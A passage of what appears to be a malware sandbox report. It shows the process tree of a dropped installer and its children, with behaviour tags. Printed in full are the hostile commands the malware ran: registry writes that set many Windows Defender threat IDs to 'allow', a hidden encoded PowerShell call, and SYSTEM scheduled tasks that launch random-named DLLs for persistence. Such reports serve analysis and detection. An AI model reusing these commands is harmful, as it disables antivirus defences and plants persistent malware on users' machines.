- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1440

C:\Users\Admin\AppData\Local\Temp\7zS5AEC.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS5AEC.tmp\Install.exe it /klPdidweOF 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5472
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5464
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2900
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2164
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5036
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5956
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6056
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3880
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5920
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5332
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5872
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5296
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6040
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4664
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Modifies data under HKEY_USERS
  PID:4700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3728
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 02:42:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JlmZqex.exe\" GH /xTEydidxi 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:6012

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
- Executes dropped EXE
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5264
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5572

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HGRrgVR.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HGRrgVR.exe GH /Ubmpdidri 385118 /S
1⤵
- Modifies data under HKEY_USERS
PID:5704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5360
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:1212
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6032
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5448
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5256
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5304
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3628
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5556
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4720
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5000
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5928
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5428
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4188
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:3628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2364
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:2328
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2516
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\OqEkks.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\jkKZwUu.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5168
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5696
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\hyEJjkJ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\tmdgJHd.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3392
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\vQNNMYo.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\eEhovjT.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2328
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 11:58:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\EXKZjHqy\vfyqkAc.dll\",#1 /nEDpdidcG 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5948
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:3552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:4152
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5084

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5900

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:5804

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JlmZqex.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JlmZqex.exe GH /xTEydidxi 385118 /S
1⤵
PID:3632
- C:\Windows\SysWOW64\cmd.exe
